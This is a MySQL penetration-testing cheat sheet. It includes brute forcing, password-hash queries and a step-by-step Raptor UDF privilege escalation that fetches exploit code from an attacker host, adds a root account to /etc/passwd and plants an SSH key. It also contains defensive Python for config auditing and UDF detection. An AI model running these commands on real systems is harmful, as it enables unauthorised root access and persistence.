MySQL database quick reference.
MariaDB is a fork of MySQL and uses similar syntax.
MySQL Service
Start MySQL service on Kali
sudo service mysql start
Stop MySQL service on Kali
sudo service mysql stop
MySQL Client
Installation – Kali
Use the latest mariadb client instead of mysql.
sudo apt install mariadb-client
Installation – Windows
- Download the ZIP Archive of MySQL Community Server for Windows. It contains mysql.exe.
- Select the latest LTS version
- Select Microsoft Windows
- Click on Download for the ZIP Archive
- Click on No thanks, just start my download
- Extract the ZIP file to the location of your choice
- Add the folder to the PATH, like “C:\Program Files\mysql-9.7.1-winx64\bin”
- You may need Microsoft Visual C++ Redistributable for x64
Connection
On Kali
sudo mysql
Locally
You can also use the “mariadb” command instead of “mysql”.
mysql -u <username> -p <database>
mysql -u<username> -p<password> -e 'show databases;'
Note that a password given on the command line is visible to other local users in the process list and ends up in the shell history; the interactive -p prompt avoids both.
Remote server
mysql -u <username> -p -h $IP
mysql -u <username> -p -h $IP --port=1234
Nmap scripts
ls -la /usr/share/nmap/scripts/mysql*
nmap -p 3306 --script=mysql* $IP
WL=/usr/share/wordlists/rockyou.txt
nmap -p 3306 --script=mysql-brute $IP --script-args userdb=users.txt,passdb=$WL
Examples
Configurations / Parameters
Server variables (runtime configuration)
Terminate the statement with \G instead of ; to display each row vertically (more easily readable).
show variables\G
Configuration file locations (Windows / XAMPP)
C:\Windows\my.ini
C:\Windows\my.cnf
C:\my.ini
C:\my.cnf
C:\xampp\mysql\my.ini
C:\xampp\mysql\my.cnf
C:\xampp\mysql\bin\my.ini
C:\xampp\mysql\bin\my.cnf
C:\xampp\mysql\data\mysql_upgrade_info
C:\xampp\mysql\data\user.frm
C:\xampp\mysql\data\mysql_error.log
C:\xampp\xampp-control.ini
#-------------------------------------------------------------------------------
# Configurations / Parameters
#-------------------------------------------------------------------------------
# Never run MySQL as root or as nobody
# mysqld refuses to run as root unless that is specified explicitly using the --user=root option
# Configuration file:
my.cnf
# Start MySQL
mysql.server start
# Stop MySQL
mysql.server stop
# Execute OS commands from within MySQL client
\! ls -l
\! nano
\! bash
# Comments
SELECT 1+1; # This comment continues to the end of line
SELECT 1+1; -- This comment continues to the end of line
SELECT 1 /* in-line or multiple line comment */ + 1;
# Identifier and string quoting
# Backticks quote identifiers (table and column names, including reserved words); single quotes delimit string literals
SELECT * FROM `select` WHERE `select`.id > 100;
SELECT 1 AS `one`, 2 AS 'two';
# List all databases
show databases;
# List all tables
use dbname;
show tables;
#-------------------------------------------------------------------------------
# Write files
#-------------------------------------------------------------------------------
SELECT id,name,email FROM customers
INTO OUTFILE '/tmp/customers.csv'
FIELDS TERMINATED BY ','
ENCLOSED BY '"'
LINES TERMINATED BY '\n';
# Writing files requires the FILE privilege and is confined to the directory named by secure_file_priv (unrestricted when that variable is empty)
select 1 from information_schema.tables limit 1 into outfile '/tmp/test.txt';
select distinct table_schema from information_schema.tables;
select table_name from information_schema.tables where table_schema = 'schema found in previous query';
select column_name from information_schema.columns where table_name='table found in previous query';
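The two hardening points above (never run mysqld as root; file writes with INTO OUTFILE / DUMPFILE are only confined when secure_file_priv names a directory) can be checked directly in the server's option file. The following is an added example, not code from the original cheat sheet: it parses a constructed my.cnf with Python's standard-library configparser and flags the weak settings, with a hardened counterpart for comparison. The sample files, the list of checks and the handling of `!includedir` directives (skipped rather than followed) are this example's own assumptions.

```python
"""Audit a MySQL/MariaDB option file (my.cnf / my.ini) for risky [mysqld] settings.

Added example (not from the original cheat sheet). The option files below are
constructed for the demo; the checks correspond to the points in the sheet:
never run mysqld as root, and INTO OUTFILE / DUMPFILE writes are only confined
when secure_file_priv names a directory.
"""
import configparser

# Constructed sample option file with several weak settings.
SAMPLE_MY_CNF = """\
# constructed /etc/mysql/my.cnf for the demo
!includedir /etc/mysql/conf.d/
[client]
port = 3306

[mysqld]
user = root
bind-address = 0.0.0.0
secure_file_priv =
local_infile = 1
plugin_dir = /usr/lib/mysql/plugin
skip-grant-tables
"""

# Hardened counterpart of the same file (also constructed).
HARDENED_MY_CNF = """\
[mysqld]
user = mysql
bind-address = 127.0.0.1
secure_file_priv = /var/lib/mysql-files
local_infile = 0
plugin_dir = /usr/lib/mysql/plugin
"""


def parse_option_file(text):
    """Parse an option file into {section: {key: value}}.

    Option files allow bare flags (skip-grant-tables) with no '=', treat '-'
    and '_' in option names as equivalent, and may carry !include directives;
    those directives are skipped here rather than followed (assumption).
    """
    body = "\n".join(l for l in text.splitlines() if not l.lstrip().startswith("!"))
    parser = configparser.ConfigParser(allow_no_value=True, strict=False, interpolation=None)
    # Normalise option names so bind-address and bind_address land on one key.
    parser.optionxform = lambda opt: opt.strip().lower().replace("-", "_")
    parser.read_string(body)
    return {
        s: {k: ("" if v is None else v.strip()) for k, v in parser[s].items()}
        for s in parser.sections()
    }


def audit_mysqld(opts):
    """Return findings (strings) for the [mysqld] section; an empty list means nothing flagged."""
    m = opts.get("mysqld", {})
    findings = []
    if m.get("user") == "root":
        findings.append("user=root: mysqld would run as root (it refuses unless --user=root is explicit)")
    if "secure_file_priv" in m and m["secure_file_priv"] == "":
        findings.append("secure_file_priv is empty: INTO OUTFILE/DUMPFILE may write anywhere the server user can")
    elif "secure_file_priv" not in m:
        # Absent means the build's default applies, and defaults differ between
        # MySQL and MariaDB; confirm on the live server with: select @@secure_file_priv;
        findings.append("secure_file_priv not set: verify the effective value with select @@secure_file_priv")
    if m.get("bind_address", "") in ("0.0.0.0", "::", "*"):
        findings.append("bind-address exposes the server on all interfaces")
    if m.get("local_infile", "0").lower() in ("1", "on", "true"):
        findings.append("local_infile enabled: clients may use LOAD DATA LOCAL")
    if "skip_grant_tables" in m:
        findings.append("skip-grant-tables: authentication is disabled")
    return findings


if __name__ == "__main__":
    for label, cfg in (("weak", SAMPLE_MY_CNF), ("hardened", HARDENED_MY_CNF)):
        print(f"[{label}]")
        for finding in audit_mysqld(parse_option_file(cfg)) or ["no findings"]:
            print("  -", finding)
```

Because the file may omit a setting that the server then takes from its build default, the audit only reports what the file says; the effective value is always the one `show variables` (or `select @@secure_file_priv`) returns on the running instance.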
Users and passwords
The column name depends on the server version: authentication_string on MySQL 5.7 and later, password on older versions.
select user, authentication_string from mysql.user;
select user, password from mysql.user;
Privilege Escalation
Raptor
https://www.exploit-db.com/exploits/1518
Requires gcc on the target, unless the target is Debian-based (in that case, compile on Kali).
searchsploit -m linux/local/1518.c
# Remove the trailing lines at the end of the exploit file before compiling
python3 -m http.server 80
wget -O /tmp/raptor_udf2.c http://KALI_IP/1518.c
cd /tmp
gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
Change the path where raptor_udf2.so is written according to the output of “select @@plugin_dir”.
mysql -u root
use mysql
create table foo(line blob);
insert into foo values(load_file('/tmp/raptor_udf2.so'));
select @@plugin_dir;
select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';
select * from mysql.func;
select do_system('id > /tmp/out; chown myuser.myuser /tmp/out');
Via /etc/passwd
select do_system('echo myprecious:$(openssl passwd PreciouS):0:0:root:/root:/bin/bash >> /etc/passwd');
ssh myprecious@x.x.x.x
[PreciouS]
Via authorized_keys
A key pair can also be generated in the user's home directory on the victim; that works as well.
# Generate a public/private key pair
ssh-keygen -t rsa
[leave all default parameters]
chmod 400 id_rsa
select do_system('echo "ssh-rsa ..." >> /root/.ssh/authorized_keys');
ssh -i id_rsa root@x.x.x.x
Cleanup tasks
mysql -u root
use mysql
drop function do_system;
select * from mysql.func;
quit
find / -name raptor_udf2.so
rm /<path to file>/raptor_udf2.so
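From the defender's side, the UDF sequence above leaves a recognisable trail: a query for @@plugin_dir, a load_file() read, an INTO DUMPFILE write into the plugin directory and a CREATE FUNCTION ... SONAME on the same connection, plus a new row in mysql.func (the same table the cleanup step checks). The following is an added example, not part of the original cheat sheet: it runs a few regular-expression rules over constructed general-log lines in the MySQL 5.7+ general_log format, correlates hits per thread id, and compares the rows of mysql.func against an allow-list. The log lines, rule names and allow-list are this example's own assumptions.

```python
"""Detect UDF installation activity in MySQL general-log lines and in mysql.func.

Added example (not from the original cheat sheet). The log lines below are
constructed in the MySQL 5.7+ general_log layout:
    <timestamp>\t<thread id> <command type>\t<argument>
"""
import re

# Constructed sample general-log excerpt: thread 12 performs the UDF steps,
# thread 13 is ordinary application traffic.
SAMPLE_GENERAL_LOG = """\
2024-05-01T10:00:01.000000Z\t   12 Query\tselect @@plugin_dir
2024-05-01T10:00:02.000000Z\t   12 Query\tcreate table foo(line blob)
2024-05-01T10:00:03.000000Z\t   12 Query\tinsert into foo values(load_file('/tmp/raptor_udf2.so'))
2024-05-01T10:00:04.000000Z\t   12 Query\tselect * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so'
2024-05-01T10:00:05.000000Z\t   12 Query\tcreate function do_system returns integer soname 'raptor_udf2.so'
2024-05-01T10:00:06.000000Z\t   13 Query\tselect id, name FROM customers WHERE id = 42
2024-05-01T10:00:07.000000Z\t   12 Query\tselect do_system('id')
"""

LOG_LINE = re.compile(r"^(?P<ts>\S+)\t\s*(?P<tid>\d+)\s+(?P<cmd>\w+)\t(?P<arg>.*)$")

# (pattern, rule name); group 1, where present, is the interesting detail.
RULES = [
    (re.compile(r"\bcreate\s+(?:aggregate\s+)?function\s+`?(\w+)`?\s+returns\s+\w+\s+soname\s+'[^']+'", re.I), "udf_create"),
    (re.compile(r"\binto\s+dumpfile\s+'([^']+)'", re.I), "dumpfile_write"),
    (re.compile(r"\binto\s+outfile\s+'([^']+)'", re.I), "outfile_write"),
    (re.compile(r"\bload_file\s*\(", re.I), "load_file_read"),
    (re.compile(r"@@(?:global\.)?plugin_dir\b", re.I), "plugin_dir_recon"),
]


def scan_general_log(text):
    """Return one event dict per (query, rule) hit, in log order."""
    events = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m or m.group("cmd") != "Query":
            continue
        for rx, rule in RULES:
            hit = rx.search(m.group("arg"))
            if hit:
                events.append({
                    "ts": m.group("ts"),
                    "thread": int(m.group("tid")),
                    "rule": rule,
                    "detail": hit.group(1) if hit.groups() else None,
                    "query": m.group("arg"),
                })
    return events


def udf_chains(events):
    """Thread ids that both wrote a file with INTO DUMPFILE and created a SONAME function."""
    by_thread = {}
    for e in events:
        by_thread.setdefault(e["thread"], set()).add(e["rule"])
    return sorted(t for t, rules in by_thread.items() if {"dumpfile_write", "udf_create"} <= rules)


def unexpected_udfs(func_rows, allowlist=frozenset()):
    """func_rows are (name, dl) tuples as returned by: select name, dl from mysql.func;
    Anything not on the allow-list (assumed to be maintained by the DBA) is reported."""
    return [(name, dl) for name, dl in func_rows if name.lower() not in allowlist]


if __name__ == "__main__":
    hits = scan_general_log(SAMPLE_GENERAL_LOG)
    for e in hits:
        print(f"{e['ts']} thread={e['thread']} {e['rule']}: {e['query']}")
    print("threads with a full dumpfile+create-function chain:", udf_chains(hits))
    # Constructed mysql.func content, as the cleanup step's "select * from mysql.func" would show it.
    print("unexpected UDFs:", unexpected_udfs([("do_system", "raptor_udf2.so")]))
```

The general log has to be enabled (general_log=ON) for the first check to see anything, and it is expensive on busy servers; the mysql.func comparison works regardless and is cheap to schedule. A non-empty result from udf_chains() or unexpected_udfs() is the signal to inspect the plugin directory, which the cleanup step above locates with find.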